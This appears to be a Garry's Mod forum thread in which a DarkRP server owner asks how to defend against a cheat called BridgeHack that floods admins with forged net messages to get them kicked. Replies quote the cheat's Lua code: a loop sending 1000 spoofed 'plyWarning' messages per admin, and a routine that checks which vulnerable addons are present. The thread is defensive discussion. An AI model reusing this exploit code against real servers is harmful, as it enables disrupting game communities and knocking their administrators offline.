Client Reliable Channel Overflow hackers.

As it says on the tin. My server has been hit lately by an army of hackers that can and have managed to automatically kick anyone with admin powers off the server with overflowed reliable channels. Auto chat spam, able to bypass server hooks and what not…

How is this possible? I think there may be an exploit somewhere that Vahn needs to fix if a player is capable of overflowing individual clients based on IsAdmin() and then leaving active code after they are gone that crashes the server if someone gets promoted.

I honestly am to my wits end on this one, to the point where I have decided to ban the IP address of the hacker, straight into srcds and the virtual server.

I explored MPGH to try and find their hack, but theres nothing there. Same with that leak site. If anyone can provide me with a basic method of detecting sv_allowcslua to be on, and then kicking that player automatically, that would be helpful.

Chances are if they’re not dumb, then they will either
A. bypass sv_allowcslua checks (by loading before autorun)
B. spoof the convar
or
C. bypass your hook anyway by removing it

But if you really want to see if the client has sv_allowcslua set to 1 (or sv_cheats) try running a command on the client every tick, though from what I’m aware, most of them are blocked (such as r_drawothermodels, lua_openscript_cl, etc)

As for fixing your issue, it sounds more like an addon issue than anything, and if the client disconnected I don’t really think they can run stuff that would cause the server to crash on someone being promoted, sounds more like a gmod issue or addon issue than anything.

What game mode is your server running ?

BridgeHack v1.3

This is the hack that is able to do this

Edit: I was able to get the file too http://pastebin.com/FPHcVQfn

If anyone can find a fix for this, please let me know

It uses net ‘exploits’. Just complaint to the addon authors to fix their poorly implemented net messages. Example below is for some complaint addon that seems to auto-kick if enough complaints come in.



concommand.Add("bh_ae_kickadmins",function()

clearcon()

chatP("Attempting to Kick admins")

chatP("This will only work on admins+")

timer.Create( "aekickdaskids", 3, 0, function()

for k,v in ipairs(player.GetAll()) do

if( v:GetUserGroup() != "user" ) then

if( v:GetUserGroup() != "vip" ) then

for i=0, 1000 do

net.Start('plyWarning')

		net.WriteEntity(v)

		net.WriteString('You have to select a player before doing a action.')

		net.SendToServer()

end

chatP('Attempting to kick: '.. v:Nick().. "!")



end end end end) end)


[editline]25th July 2015[/editline]

Oops didn’t realize this was a dead thread.

Yeah, that “hack” uses a bunch of exploits in poorly coded addons that do not sanitize net messages sent from client.

Here’s a list of addons affected:



concommand.Add("bh_check",function()
 
clearcon()
 
cleardchat()
 
chatP("Checking for exploitable addons...")
 
if HIT then
 
        chatPG("Hitman X | Found")
 
else
 
        chatPR("Hitman X | Not Found")
 
end
 
if HitMenu then
 
        chatPG("Hit Menu | Found")
 
else
 
        chatPR("Hit Menu | Not Found")
 
end
 
if BAIL then
 
        chatPG("BailNPC | Found")
 
else
 
        chatPR("BailNPC | Not Found")
 
end
 
if dLogs then
 
        chatPG("DLOGS | Found")
 
else
 
        chatPR("DLOGS | Not Found")
 
end
 
if ChanNum then
 
        chatPG("MXRadio| Found")
 
else
 
        chatPR("MXRadio | Not Found")
 
end
 
if VC_Menu_Info_Panel_Build then
 
        chatPG("VCMD | Found")
 
else
 
        chatPR("VCMD | Not Found")
 
end
 
if MDE then
 
        chatPG("MDE | Found")
 
else
 
        chatPR("MDE | Not Found")
 
end
 
if NLR then
 
        chatPG("NLR |  Found")
 
else
 
        chatPR("NLR | Not Found")
 
end
 
if Warnings_for_kick then
 
        chatPG("ULX Extended | Found")
 
else
 
        chatPR("ULX Extended | Not Found")
 
end
 
 
 
end)   

It’s for DarkRP

Edit: What I’m looking for is a way to combat this